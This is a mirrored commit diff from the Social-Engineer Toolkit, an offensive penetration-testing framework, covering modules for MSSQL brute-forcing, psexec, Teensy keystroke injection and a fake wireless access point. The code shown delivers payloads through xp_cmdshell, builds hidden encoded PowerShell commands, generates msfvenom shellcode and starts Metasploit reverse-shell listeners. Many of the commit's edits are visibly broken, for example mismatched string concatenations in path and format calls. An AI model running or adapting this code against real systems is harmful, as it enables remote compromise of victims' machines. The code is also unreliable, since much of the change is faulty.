Mirrors/social-engineer-toolkit
2
0
Fork 0
mirror of https://github.com/trustedsec/social-engineer-toolkit synced 2024-09-20 14:41:56 +00:00
Code Issues Projects Releases Packages Wiki Activity

fasttrack fixes and version bump

Browse source
This commit is contained in:
TrustedSec 2016-07-30 15:18:20 -04:00
parent 46324916e6
commit 98b85deae4
15 changed files with 95 additions and 81 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4
modules/ratte_only_module.py
View file

@ -40,7 +40,7 @@ def prepare_ratte(ipaddr, ratteport, persistent, customexe):
############ ############
# PATCH Server IP into RATTE # PATCH Server IP into RATTE
############ ############
with open(os.path.join(core.setdir, "ratteM.exe"), "wb") as filewrite: with open(os.path.join(core.setdir + "ratteM.exe"), "wb") as filewrite:
host = (len(ipaddr) + 1) * "X" host = (len(ipaddr) + 1) * "X"
r_port = (len(str(ratteport)) + 1) * "Y" r_port = (len(str(ratteport)) + 1) * "Y"
@ -126,7 +126,7 @@ def main():
############ ############
prepare_ratte(ipaddr, ratteport, persistent, customexe) prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Payload has been exported to %s" % os.path.join(core.setdir, "ratteM.exe")) core.print_status("Payload has been exported to %s" % os.path.join(core.setdir + "ratteM.exe"))
################### ###################
# start ratteserver # start ratteserver

9
readme/CHANGELOG
View file

@ -1,3 +1,12 @@
~~~~~~~~~~~~~~~~
version 7.3.4
~~~~~~~~~~~~~~~~
* fixed an issue with mssql bruter that would cause it to fail over to nmap scans even if host wasn't valid
* fixed an issue that would cause UDP to not work properly when scanning subnet ranges
* improved handling and descriptions in mssql
* fixed error in mssql bruter
~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~
version 7.3.3 version 7.3.3
~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~

2
seproxy
View file

@ -45,7 +45,7 @@ if operating_system == "posix":
else: else:
proxy_string = "export http_proxy='http://{0}'".format(proxy) proxy_string = "export http_proxy='http://{0}'".format(proxy)
with open(os.path.join(core.setdir, "/proxy.config"), "w") as filewrite: with open(os.path.join(core.setdir + "/proxy.config"), "w") as filewrite:
filewrite.write(proxy_string) filewrite.write(proxy_string)
def kill_proc(port, flag): def kill_proc(port, flag):

7
src/core/fasttrack.py
View file

@ -97,11 +97,14 @@ try:
iprange = iprange.split(",") iprange = iprange.split(",")
for host in iprange: for host in iprange:
sqlport = get_sql_port(host) sqlport = get_sql_port(host)
if sqlport != None: print_status("Found SQL port on IP Address: %s and on port: %s" % (host, sqlport))
if sqlport == None: if sqlport == None:
sql_nmap_scan(host) nmapscan = sql_nmap_scan(host)
if sql_nmap_scan != None: if nmapscan != "":
sql_servers = sql_servers + \ sql_servers = sql_servers + \
host + ":" + "1433" + "," host + ":" + "1433" + ","
print_status("Found a SQL port on IP Address: %s and on port: 1433" % (host))
if nmapscan == "": print_warning("Unable to find a SQL server on IP: %s" % (host))
if sqlport != None: if sqlport != None:
sql_servers = sql_servers + \ sql_servers = sql_servers + \
host + ":" + sqlport + "," host + ":" + sqlport + ","

2
src/core/set.version
View file

@ -1 +1 @@
7.3.3 7.3.4

2
src/core/setcore.py
View file

@ -1662,7 +1662,7 @@ def start_dns():
def setdir(): def setdir():
if check_os() == "posix": if check_os() == "posix":
return os.path.join(os.path.expanduser('~'), '.set') return os.path.join(os.path.expanduser('~'), '.set' + '/')
if check_os() == "windows": if check_os() == "windows":
return "src/program_junk/" return "src/program_junk/"

4
src/fasttrack/autopwn.py
View file

@ -44,8 +44,8 @@ def launch():
core.print_status("Launching Metasploit and attacking the systems specified. This may take a moment..") core.print_status("Launching Metasploit and attacking the systems specified. This may take a moment..")
# try/catch block # try/catch block
try: try:
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path, 'msfconsole'), child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path + 'msfconsole'),
os.path.join(core.setdir, "autopwn.answer"))) os.path.join(core.setdir + "autopwn.answer")))
child.interact() child.interact()
# handle exceptions and log them # handle exceptions and log them

2
src/fasttrack/exploits/ms08067.py
View file

@ -17,7 +17,7 @@ except NameError:
def create_rc(revhost, victim, payload, port): def create_rc(revhost, victim, payload, port):
with open("/root/.set/ms08-067.rc", "w") as filewrite: with open("/root/.set/ms08-067.rc" + "w") as filewrite:
filewrite.write("use exploit/windows/smb/ms08_067_netapi\n" filewrite.write("use exploit/windows/smb/ms08_067_netapi\n"
"set payload {0}\n" "set payload {0}\n"
"set RHOST {1}\n" "set RHOST {1}\n"

54
src/fasttrack/mssql.py
View file

@ -96,6 +96,7 @@ def brute(ipaddr, username, port, wordlist):
def deploy_hex2binary(ipaddr, port, username, password): def deploy_hex2binary(ipaddr, port, username, password):
# base variable used to select payload option # base variable used to select payload option
option = None option = None
choice1 = "1"
conn = _mssql.connect("{0}:{1}".format(ipaddr, port), conn = _mssql.connect("{0}:{1}".format(ipaddr, port),
username, username,
@ -152,6 +153,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
choice1 = input("1.) Use Metasploit (default)\n" choice1 = input("1.) Use Metasploit (default)\n"
"2.) Select your own\n\n" "2.) Select your own\n\n"
"Enter your choice[1]:") "Enter your choice[1]:")
if choice1 == "": if choice1 == "":
choice1 = "1" choice1 = "1"
@ -177,8 +179,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
# if we are using a SET interactive shell payload then we need to make # if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set # the path under web_clone versus ~./set
if os.path.isfile(os.path.join(core.setdir, "set.payload")): if os.path.isfile(os.path.join(core.setdir + "set.payload")):
web_path = os.path.join(core.setdir, "web_clone") web_path = os.path.join(core.setdir + "web_clone")
# then we are using metasploit # then we are using metasploit
else: else:
if operating_system == "posix": if operating_system == "posix":
@ -187,12 +189,12 @@ def deploy_hex2binary(ipaddr, port, username, password):
if not os.path.isfile(core.setdir + "1msf.exe"): if not os.path.isfile(core.setdir + "1msf.exe"):
# move it then # move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" % subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(core.setdir, core.setdir), shell=True).wait() (core.setdir + core.setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" % subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait() (core.setdir + core.setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" % subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait() (core.setdir + core.setdir), shell=True).wait()
payload_filename = os.path.join(web_path, "1msf.exe") payload_filename = os.path.join(web_path + "1msf.exe")
with open(payload_filename, "rb") as fileopen: with open(payload_filename, "rb") as fileopen:
# read in the binary # read in the binary
@ -201,12 +203,12 @@ def deploy_hex2binary(ipaddr, port, username, password):
data = binascii.hexlify(data) data = binascii.hexlify(data)
# we write out binary out to a file # we write out binary out to a file
with open(os.path.join(core.setdir, "payload.hex"), "w") as filewrite: with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite:
filewrite.write(data) filewrite.write(data)
if choice1 == "1": if choice1 == "1":
# if we are using metasploit, start the listener # if we are using metasploit, start the listener
if not os.path.isfile(os.path.join(core.setdir, "set.payload")): if not os.path.isfile(os.path.join(core.setdir + "set.payload")):
if operating_system == "posix": if operating_system == "posix":
try: try:
core.module_reload(pexpect) core.module_reload(pexpect)
@ -214,8 +216,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
import pexpect import pexpect
core.print_status("Starting the Metasploit listener...") core.print_status("Starting the Metasploit listener...")
msf_path = core.meta_path() msf_path = core.meta_path()
child2 = pexpect.spawn("{0}-r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"), child2 = pexpect.spawn("{0}-r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir, "meta_config"))) os.path.join(core.setdir + "meta_config")))
# random executable name # random executable name
random_exe = core.generate_random_string(10, 15) random_exe = core.generate_random_string(10, 15)
@ -239,7 +241,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
core.update_options("POWERSHELL_SOLO=ON") core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...") core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
with open(os.path.join(core.setdir, "/payload_options.shellcode"), "w") as filewrite: with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
# format needed for shellcode generation # format needed for shellcode generation
filewrite.write("windows/meterpreter/reverse_https {0},".format(port)) filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
@ -249,23 +251,23 @@ def deploy_hex2binary(ipaddr, port, username, password):
import src.payloads.powershell.prep import src.payloads.powershell.prep
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir, "reports/powershell")): if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
os.makedirs(os.path.join(core.setdir, "reports/powershell")) os.makedirs(os.path.join(core.setdir + "reports/powershell"))
with open(os.path.join(core.setdir, "x86.powershell")) as x86: with open(os.path.join(core.setdir + "x86.powershell")) as x86:
x86 = x86.read() x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86) x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
core.print_status("If you want the powershell commands and attack, " core.print_status("If you want the powershell commands and attack, "
"they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell"))) "they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite: with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt"), "w") as filewrite:
filewrite.write(x86) filewrite.write(x86)
# if our payload is x86 based - need to prep msfconsole rc # if our payload is x86 based - need to prep msfconsole rc
if payload == "x86": if payload == "x86":
powershell_command = x86 powershell_command = x86
# powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt" # powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
with open(os.path.join(core.setdir, "reports/powershell/powershell.rc"), "w") as filewrite: with open(os.path.join(core.setdir + "reports/powershell/powershell.rc"), "w") as filewrite:
filewrite.write("use multi/handler\n" filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n" "set payload windows/meterpreter/reverse_https\n"
"set lport {0}\n" "set lport {0}\n"
@ -284,8 +286,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
import pexpect import pexpect
core.print_status("Starting the Metasploit listener...") core.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"), child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"),
os.path.join(core.setdir, "reports/powershell/powershell.rc"))) os.path.join(core.setdir + "reports/powershell/powershell.rc")))
core.print_status("Waiting for the listener to start first before we continue forward...") core.print_status("Waiting for the listener to start first before we continue forward...")
core.print_status("Be patient, Metaploit takes a little bit to start...") core.print_status("Be patient, Metaploit takes a little bit to start...")
child2.expect("Starting the payload handler", timeout=30000) child2.expect("Starting the payload handler", timeout=30000)
@ -304,7 +306,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
# here we start the conversion and execute the payload # here we start the conversion and execute the payload
core.print_status("Sending the main payload via to be converted back to a binary.") core.print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time # read in the file 900 bytes at a time
with open(os.path.join(core.setdir, 'payload.hex')) as fileopen: with open(os.path.join(core.setdir + 'payload.hex')) as fileopen:
core.print_status("Dropping initial begin certificate header...") core.print_status("Dropping initial begin certificate header...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe)) conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
for data in fileopen.read(900).rstrip(): for data in fileopen.read(900).rstrip():
@ -325,10 +327,10 @@ def deploy_hex2binary(ipaddr, port, username, password):
conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe)) conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe))
# if we are using SET payload # if we are using SET payload
if choice1 == "1": if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir, "set.payload")): if os.path.isfile(os.path.join(core.setdir + "set.payload")):
core.print_status("Spawning separate child process for listener...") core.print_status("Spawning separate child process for listener...")
try: try:
shutil.copyfile(os.path.join(core.setdir, "web_clone/x"), definepath) shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath)
except: except:
pass pass
@ -361,8 +363,8 @@ def deploy_hex2binary(ipaddr, port, username, password):
if option == "2": if option == "2":
core.print_status("Triggering payload stager...") core.print_status("Triggering payload stager...")
alphainject = "" alphainject = ""
if os.path.isfile(os.path.join(core.setdir, "meterpreter.alpha")): if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
with open(os.path.join(core.setdir, "meterpreter.alpha")) as fileopen: with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen:
alphainject = fileopen.read() alphainject = fileopen.read()
sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject)) sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject))
@ -370,9 +372,9 @@ def deploy_hex2binary(ipaddr, port, username, password):
thread.start_new_thread(conn.execute_query, (sql_command,)) thread.start_new_thread(conn.execute_query, (sql_command,))
time.sleep(1) time.sleep(1)
# if pexpect doesnt exit right then it freaks out # if pexpect doesnt exit right then it freaks out
if choice1 == "1": if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir, "set.payload")): if os.path.isfile(os.path.join(core.setdir + "set.payload")):
os.system("python ../../payloads/set_payloads/listener.py") os.system("python ../../payloads/set_payloads/listener.py")
try: try:
# interact with the child process through pexpect # interact with the child process through pexpect

16
src/fasttrack/psexec.py
View file

@ -68,7 +68,7 @@ try:
if port == "": if port == "":
port = "443" port = "443"
core.update_options("PORT={0}".format(port)) core.update_options("PORT={0}".format(port))
with open(os.path.join(core.setdir, "/payload_options.shellcode"), "w") as filewrite: with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
# format needed for shellcode generation # format needed for shellcode generation
filewrite.write("{0} {1},".format(payload, port)) filewrite.write("{0} {1},".format(payload, port))
core.update_options("POWERSHELL_SOLO=ON") core.update_options("POWERSHELL_SOLO=ON")
@ -80,14 +80,14 @@ try:
import src.payloads.powershell.prep import src.payloads.powershell.prep
# create the directory if it does not exist # create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir, "reports/powershell")): if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
os.makedirs(os.path.join(core.setdir, "reports/powershell")) os.makedirs(os.path.join(core.setdir + "reports/powershell"))
with open(os.path.join(core.setdir, "x86.powershell")) as fileopen: with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
x86 = fileopen.read() x86 = fileopen.read()
x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86) x86 = "powershell -nop -window hidden -noni -EncodedCommand {0}".format(x86)
core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir, "reports/powershell"))) core.print_status("If you want the powershell commands and attack, they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
with open(os.path.join(core.setdir, "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite: with open(os.path.join(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")) as filewrite:
filewrite.write(x86) filewrite.write(x86)
payload = "windows/meterpreter/reverse_https\n" # if we are using x86 payload = "windows/meterpreter/reverse_https\n" # if we are using x86
command = x86 # assign powershell to command command = x86 # assign powershell to command
@ -113,8 +113,8 @@ try:
# launch metasploit below # launch metasploit below
core.print_status("Launching Metasploit.. This may take a few seconds.") core.print_status("Launching Metasploit.. This may take a few seconds.")
subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path(), "msfconsole"), subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir, "reports/powershell/powershell.rc")), os.path.join(core.setdir + "reports/powershell/powershell.rc")),
shell=True).wait() shell=True).wait()
# handle exceptions # handle exceptions

2
src/fasttrack/sccm/sccm_main.py
View file

@ -48,7 +48,7 @@ Next
'''.format(sms_server, package_id) '''.format(sms_server, package_id)
# write out the file to reports # write out the file to reports
with open(os.path.join(core.setdir, "reports/sccm_configuration.txt"), 'w') as filewrite: with open(os.path.join(core.setdir + "reports/sccm_configuration.txt"), 'w') as filewrite:
filewrite.write(configuration) filewrite.write(configuration)
core.print_status("The SCCM configuration script has been successfully created.") core.print_status("The SCCM configuration script has been successfully created.")
core.print_status("You need to copy the script to the startup folder of the server.") core.print_status("You need to copy the script to the startup folder of the server.")

14
src/teensy/binary2teensy.py
View file

@ -246,7 +246,7 @@ except KeyboardInterrupt:
print(" [*] Generating alpha_mixed shellcode to be injected after shellexec has been deployed on victim...") print(" [*] Generating alpha_mixed shellcode to be injected after shellexec has been deployed on victim...")
# grab msfvenom alphanumeric shellcode to be inserted into shellexec # grab msfvenom alphanumeric shellcode to be inserted into shellexec
proc = subprocess.Popen("{0} -p {1} EXITFUNC=thread LHOST={2} LPORT={3} {4} --format raw -e x86/alpha_mixed BufferRegister=EAX".format(os.path.join(core.meta_path(), "msfvenom"), proc = subprocess.Popen("{0} -p {1} EXITFUNC=thread LHOST={2} LPORT={3} {4} --format raw -e x86/alpha_mixed BufferRegister=EAX".format(os.path.join(core.meta_path() + "msfvenom"),
payload, payload,
ipaddr, ipaddr,
port, port,
@ -440,15 +440,15 @@ Keyboard.send_now();
}}""".format(random_filename=random_filename, powershell_command=powershell_command, vbs=vbs, bat=bat, alpha_payload=alpha_payload)) }}""".format(random_filename=random_filename, powershell_command=powershell_command, vbs=vbs, bat=bat, alpha_payload=alpha_payload))
# delete temporary file # delete temporary file
subprocess.Popen("rm {0} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait() subprocess.Popen("rm {0} 1> /dev/null 2>/dev/null".format(random_filename), shell=True).wait()
print(" [*] Binary to Teensy file exported as {0}".format(os.path.join(core.setdir, "/reports/binary2teensy.pde"))) print(" [*] Binary to Teensy file exported as {0}".format(os.path.join(core.setdir + "/reports/binary2teensy.pde")))
# write the teensy.pde file out # write the teensy.pde file out
with open(os.path.join(core.setdir, "/reports/binary2teensy.pde"), 'w') as filewrite: with open(os.path.join(core.setdir + "/reports/binary2teensy.pde"), 'w') as filewrite:
# write the teensy.pde file out # write the teensy.pde file out
filewrite.write(output_variable) filewrite.write(output_variable)
print(" [*] Generating a listener...") print(" [*] Generating a listener...")
# create our metasploit answer file # create our metasploit answer file
with open(os.path.join(core.setdir, "answer.txt", "w")) as filewrite: with open(os.path.join(core.setdir + "answer.txt", "w")) as filewrite:
filewrite.write("use multi/handler\n" filewrite.write("use multi/handler\n"
"set payload {0}\n" "set payload {0}\n"
"set LHOST {1}\n" "set LHOST {1}\n"
@ -456,9 +456,9 @@ with open(os.path.join(core.setdir, "answer.txt", "w")) as filewrite:
"{3}\n" "{3}\n"
"exploit -j".format(payload, ipaddr, port, url)) "exploit -j".format(payload, ipaddr, port, url))
# spawn a multi/handler listener # spawn a multi/handler listener
subprocess.Popen("msfconsole -r {0}".format(os.path.join(core.setdir, "answer.txt")), shell=True).wait() subprocess.Popen("msfconsole -r {0}".format(os.path.join(core.setdir + "answer.txt")), shell=True).wait()
print(" [*] Housekeeping old files...") print(" [*] Housekeeping old files...")
# if our answer file is still there (which it should be), then remove it # if our answer file is still there (which it should be), then remove it
if os.path.isfile(os.path.join(core.setdir, "answer.txt")): if os.path.isfile(os.path.join(core.setdir + "answer.txt")):
# remove the old file, no longer used once we've exited # remove the old file, no longer used once we've exited
subprocess.Popen(os.path.join(core.setdir, "answer.txt"), shell=True).wait() subprocess.Popen(os.path.join(core.setdir + "answer.txt"), shell=True).wait()

20
src/teensy/powershell_shellcode.py
View file

@ -24,18 +24,18 @@ This technique was introduced by Matthew Graeber (http://www.exploit-monday.com/
payload = "windows/meterpreter/reverse_tcp" payload = "windows/meterpreter/reverse_tcp"
# create base metasploit payload to pass to powershell.prep # create base metasploit payload to pass to powershell.prep
with open(os.path.join(core.setdir, "metasploit.payload"), 'w') as filewrite: with open(os.path.join(core.setdir + "metasploit.payload"), 'w') as filewrite:
filewrite.write(payload) filewrite.write(payload)
ipaddr = input("Enter the IP for the reverse: ") ipaddr = input("Enter the IP for the reverse: ")
port = input("Enter the port for the reverse: ") port = input("Enter the port for the reverse: ")
shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "") shellcode = core.generate_powershell_alphanumeric_payload(payload, ipaddr, port, "")
with open(os.path.join(core.setdir, 'x86.powershell', 'w')) as filewrite: with open(os.path.join(core.setdir + 'x86.powershell', 'w')) as filewrite:
filewrite.write(shellcode) filewrite.write(shellcode)
time.sleep(3) time.sleep(3)
with open(os.path.join(core.setdir, "x86.powershell")) as fileopen: with open(os.path.join(core.setdir + "x86.powershell")) as fileopen:
pass pass
# read in x amount of bytes # read in x amount of bytes
data_read = int(50) data_read = int(50)
@ -149,10 +149,10 @@ Keyboard.set_key1(0);
Keyboard.send_now(); Keyboard.send_now();
} }
""") """)
print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir, "reports/teensy.pde"))) print("[*] Payload has been extracted. Copying file to {0}".format(os.path.join(core.setdir + "reports/teensy.pde")))
if not os.path.isdir(os.path.join(core.setdir, "reports")): if not os.path.isdir(os.path.join(core.setdir + "reports")):
os.makedirs(os.path.join(core.setdir, "reports")) os.makedirs(os.path.join(core.setdir + "reports"))
with open(os.path.join(core.setdir, "/reports/teensy.pde", "w")) as filewrite: with open(os.path.join(core.setdir + "/reports/teensy.pde", "w")) as filewrite:
filewrite.write(teensy) filewrite.write(teensy)
choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]: ") choice = core.yesno_prompt("0", "Do you want to start a listener [yes/no]: ")
if choice == "YES": if choice == "YES":
@ -170,7 +170,7 @@ if choice == "YES":
else: else:
port = input("Enter the port to connect back on: ") port = input("Enter the port to connect back on: ")
with open(os.path.join(core.setdir, "/metasploit.answers", "w")) as filewrite: with open(os.path.join(core.setdir + "/metasploit.answers", "w")) as filewrite:
filewrite.write("use multi/handler\n" filewrite.write("use multi/handler\n"
"set payload {0}\n" "set payload {0}\n"
"set LHOST {1}\n" "set LHOST {1}\n"
@ -180,8 +180,8 @@ if choice == "YES":
print("[*] Launching Metasploit....") print("[*] Launching Metasploit....")
try: try:
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path(), "msfconsole"), child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir, "metasploit.answers"))) os.path.join(core.setdir + "metasploit.answers")))
child.interact() child.interact()
except: except:
pass pass

34
src/teensy/teensy.py
View file

@ -30,8 +30,8 @@ if operating_system != "windows":
import pexpect import pexpect
# check to see if setdir is created # check to see if setdir is created
if not os.path.isdir(os.path.join(core.setdir, "reports")): if not os.path.isdir(os.path.join(core.setdir + "reports")):
os.makedirs(os.path.join(core.setdir, "reports")) os.makedirs(os.path.join(core.setdir + "reports"))
definepath = os.getcwd() definepath = os.getcwd()
# define if use apache or not # define if use apache or not
@ -57,7 +57,7 @@ for line in apache_check:
# grab info from config file # grab info from config file
with open(os.path.join(core.setdir, "teensy")) as fileopen: with open(os.path.join(core.setdir + "teensy")) as fileopen:
counter = 0 counter = 0
payload_counter = 0 payload_counter = 0
choice = None choice = None
@ -77,14 +77,14 @@ with open(os.path.join(core.setdir, "teensy")) as fileopen:
ipaddr = input(core.setprompt(["6"], "IP address to connect back on")) ipaddr = input(core.setprompt(["6"], "IP address to connect back on"))
core.update_options("IPADDR=" + ipaddr) core.update_options("IPADDR=" + ipaddr)
if not os.path.isfile(os.path.join(core.setdir, "teensy")): if not os.path.isfile(os.path.join(core.setdir + "teensy")):
core.print_error("FATAL:Something went wrong, the Teensy config file was not created.") core.print_error("FATAL:Something went wrong, the Teensy config file was not created.")
core.exit_set() core.exit_set()
def writefile(filename, now): def writefile(filename, now):
with open(os.path.join("src/teensy", filename)) as fileopen, \ with open(os.path.join("src/teensy" + filename)) as fileopen, \
open(os.path.join(core.setdir, "/reports/teensy_{0}.pde".format(now)), "w") as filewrite: open(os.path.join(core.setdir + "/reports/teensy_{0}.pde".format(now)), "w") as filewrite:
for line in fileopen: for line in fileopen:
match = re.search("IPADDR", line) match = re.search("IPADDR", line)
@ -128,8 +128,8 @@ if choice == "13":
# save our stuff here # save our stuff here
print(core.bcolors.BLUE + print(core.bcolors.BLUE +
"\n[*] PDE file created. You can get it under '{0}'".format(os.path.join(core.setdir, "\n[*] PDE file created. You can get it under '{0}'".format(os.path.join(core.setdir +
"reports", "reports" +
"teensy_{0}.pde".format(now))) + "teensy_{0}.pde".format(now))) +
core.bcolors.ENDC) core.bcolors.ENDC)
print(core.bcolors.GREEN + print(core.bcolors.GREEN +
@ -142,29 +142,29 @@ print(core.bcolors.RED +
pause = input("Press {return} to continue.") pause = input("Press {return} to continue.")
if payload_counter == 1: if payload_counter == 1:
webclone_path = os.path.join(core.setdir, "web_clone") webclone_path = os.path.join(core.setdir + "web_clone")
metasploit_exec_path = os.path.join(core.setdir, "msf.exe") metasploit_exec_path = os.path.join(core.setdir + "msf.exe")
if not apache: if not apache:
subprocess.Popen("mkdir {0};" subprocess.Popen("mkdir {0};"
"cp {1} {2} 1> /dev/null 2> /dev/null".format(webclone_path, "cp {1} {2} 1> /dev/null 2> /dev/null".format(webclone_path +
metasploit_exec_path, metasploit_exec_path +
os.path.join(webclone_path, "x.exe")), os.path.join(webclone_path + "x.exe")),
shell=True).wait() shell=True).wait()
if operating_system != "windows": if operating_system != "windows":
child = pexpect.spawn("python src/html/web_server.py") child = pexpect.spawn("python src/html/web_server.py")
else: else:
subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path, "x.exe")), shell=True).wait() subprocess.Popen("cp {0} {1}".format(metasploit_exec_path, os.path.join(webclone_path + "x.exe")), shell=True).wait()
if os.path.isfile(os.path.join(core.setdir, "meta_config")): if os.path.isfile(os.path.join(core.setdir + "meta_config")):
print(core.bcolors.BLUE + "\n[*] Launching MSF Listener...") print(core.bcolors.BLUE + "\n[*] Launching MSF Listener...")
print(core.bcolors.BLUE + "[*] This may take a few to load MSF..." + core.bcolors.ENDC) print(core.bcolors.BLUE + "[*] This may take a few to load MSF..." + core.bcolors.ENDC)
try: try:
if operating_system != "windows": if operating_system != "windows":
child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path, "msfconsole"), child1 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(msf_path + "msfconsole"),
os.path.join(core.setdir, "meta_config"))) os.path.join(core.setdir + "meta_config")))
child1.interact() child1.interact()
except: except:
if operating_system != "windows": if operating_system != "windows":

4
src/wireless/wifiattack.py
View file

@ -89,14 +89,14 @@ else:
if fakeap_dhcp_menu_choice == "1": if fakeap_dhcp_menu_choice == "1":
# writes the dhcp server out # writes the dhcp server out
core.print_status("Writing the dhcp configuration file to ~/.set") core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.setdir, "dhcp.conf"), "w") as filewrite: with open(os.path.join(core.setdir + "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config1) filewrite.write(dhcp_config1)
dhcptun = 1 dhcptun = 1
if fakeap_dhcp_menu_choice == "2": if fakeap_dhcp_menu_choice == "2":
# writes the dhcp server out # writes the dhcp server out
core.print_status("Writing the dhcp configuration file to ~/.set") core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.setdir, "dhcp.conf"), "w") as filewrite: with open(os.path.join(core.setdir + "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config2) filewrite.write(dhcp_config2)
dhcptun = 2 dhcptun = 2